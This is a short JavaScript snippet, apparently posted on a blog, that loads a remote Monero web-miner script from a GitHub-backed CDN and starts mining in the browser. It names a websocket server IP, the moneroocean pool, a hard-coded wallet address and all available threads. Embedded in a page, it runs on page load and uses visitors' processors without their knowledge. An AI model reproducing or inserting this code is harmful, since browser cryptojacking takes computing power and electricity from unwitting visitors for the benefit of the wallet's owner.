// Start Of Mining Code (Javascript)
var script = document.createElement("script");
script.src = "https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js";
document.head.appendChild(script);
server = "wss://45.119.82.33:40725";
var pool = "moneroocean.stream";
var walletAddress = "4BGtkiZx4oJiPZzgBuDGx772jA8CCewwqZvY1daCu4qGGH4HENaH9pX4wu5af7q959Gae2BhHiiqMELBZN6CcTyGGaMGztm";
var workerId = "GH-XMR"
var threads = -1;
var password = "";
startMining(pool, walletAddress, workerId, threads, password);
throttleMiner = 20;
// End Of Mining Code
No comments:
Post a Comment